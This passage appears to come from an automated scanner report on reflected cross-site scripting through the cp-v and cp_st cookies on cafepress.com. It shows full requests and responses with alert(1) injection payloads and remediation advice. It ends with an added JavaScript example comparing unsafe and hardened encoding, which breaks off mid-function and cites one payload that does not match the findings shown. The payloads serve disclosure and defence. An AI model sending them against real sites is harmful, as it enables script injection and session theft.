The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload baa43"-alert(1)-"4cc6f92795 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+boxers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAbaa43"-alert(1)-"4cc6f92795 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW21 Cteonnt-Length: 59461 Date: Sun, 26 Dec 2010 13:47:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59461 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAbaa43"-alert(1)-"4cc6f92795 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.19. http://www.cafepress.com/+boxers [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+boxers
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6727</script><script>alert(1)</script>52729b93123 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+boxers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d6727</script><script>alert(1)</script>52729b93123 ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW20 Cteonnt-Length: 59479 Date: Sun, 26 Dec 2010 13:47:26 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59479 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = 'd6727</script><script>alert(1)</script>52729b93123 ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.20. http://www.cafepress.com/+bumper-stickers [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+bumper-stickers
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 350cc"-alert(1)-"5204568fc11 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bumper-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA350cc"-alert(1)-"5204568fc11 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW13 Cteonnt-Length: 59754 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:56 GMT; path=/ Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:56 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59754 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA350cc"-alert(1)-"5204568fc11 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
1.21. http://www.cafepress.com/+bumper-stickers [cp_st cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+bumper-stickers
Issue detail
The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 144cb</script><script>alert(1)</script>4632a294b1c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+bumper-stickers HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=144cb</script><script>alert(1)</script>4632a294b1c ; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; 
__utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW27 ntCoent-Length: 59771 Date: Sun, 26 Dec 2010 13:48:55 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59771 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... = 'cafepress.com'; window.cafepress.originCountryCode = 'US' window.cafepress.tealeaf = {}; window.cafepress.tealeaf.pageLandingType = 'SearchResults' window.cafepress.tealeaf.searchTerm = '144cb</script><script>alert(1)</script>4632a294b1c ' window.cafepress.tealeaf.salesChannel = 'Marketplace' window.cafepress.tealeaf.trafficMedium = 'SEO' window.cafepress.tealeaf.utmTracking = '' window.cafepress.tealeaf.abTestString = 'EXP_08_00:C...[SNIP]...
1.22. http://www.cafepress.com/+buttons [cp-v cookie]
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+buttons
Issue detail
The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e64e3"-alert(1)-"4f4360aac81 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /+buttons HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81 ; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW12 Cteonnt-Length: 59646 Date: Sun, 26 Dec 2010 13:48:57 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cp_sc=100204; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:57 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59646 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... 2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T"; s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81 "; s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID if (s.eVar26 == "") { if ("" == "affiliate") { s.eVar26 = "2099"; //2099 = affiliate } el...[SNIP]...
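The two payloads documented in these findings, replayed against a constructed copy of the vulnerable templates and then against a hardened encoder. This is an added example written for this page, not code from the report, from the scanner that produced it, or from cafepress.com. Only the two cookie payloads are taken from the report; the template strings, the EVAR30_PREFIX constant, the function names and the alert() recorder are assumptions made for the example.

```javascript
// Added example, not code from the report or from cafepress.com. It replays
// the two reflections documented here against a constructed copy of the
// vulnerable templates, then against a hardened encoder. Plain Node.js, no
// dependencies. Payload strings are copied from the report; everything else
// (template text, the stand-in alert recorder) is constructed for the example.

// Reflected cookie values as they appear in the report's requests.
const CPV_VALUE = 'D0026F27AADDAF9A26C54608326FC1BAe64e3"-alert(1)-"4f4360aac81 ';
const CPST_VALUE = "49536</script><script>alert(1)</script>00786d92ac ";
const EVAR30_PREFIX = "A8D8655B7B25F13535D4E6E67BEC27E9:"; // constructed stand-in

// Vulnerable pattern, as seen in the responses: the raw cookie value is
// concatenated between the quotes of a JavaScript string literal.
function renderEVar30Unsafe(cpv) {
  return 's.eVar30 = "' + EVAR30_PREFIX + cpv + '";';
}
function renderSearchTermUnsafe(cpst) {
  return "window.cafepress.tealeaf.searchTerm = '" + cpst + "';";
}

// Hardened encoder. JSON.stringify handles quotes, backslashes and control
// characters; the second pass escapes what matters to the HTML tokenizer
// (<, >, &) and the two line terminators JSON leaves unescaped (U+2028,
// U+2029). The output is always one JS string literal and can never contain
// the "</script" sequence.
function toJsStringLiteral(value) {
  return JSON.stringify(String(value)).replace(/[<>&\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}
function renderEVar30Safe(cpv) {
  return "s.eVar30 = " + toJsStringLiteral(EVAR30_PREFIX + cpv) + ";";
}
function renderSearchTermSafe(cpst) {
  return "window.cafepress.tealeaf.searchTerm = " + toJsStringLiteral(cpst) + ";";
}

// The HTML parser closes a <script> element at the first "</script", whatever
// the JavaScript quoting state is, so any inline script containing that
// sequence is exploitable no matter how well quotes are escaped.
function containsScriptTerminator(js) {
  return /<\/script/i.test(js);
}

// Execute one rendered statement with alert() replaced by a recorder, to see
// whether the injected expression runs and what the assignment ends up with.
// Analysis aid for the constructed strings above only; never evaluate real
// untrusted input this way.
function executeStatement(statement) {
  const alerts = [];
  const s = {};
  const window = { cafepress: { tealeaf: {} } };
  new Function("s", "window", "alert", statement)(s, window, (x) => alerts.push(x));
  return { s, window, alerts };
}

// Summarise both reflections, unsafe versus hardened.
function compare() {
  const unsafeEVar = executeStatement(renderEVar30Unsafe(CPV_VALUE));
  const safeEVar = executeStatement(renderEVar30Safe(CPV_VALUE));
  const safeTerm = executeStatement(renderSearchTermSafe(CPST_VALUE));
  return {
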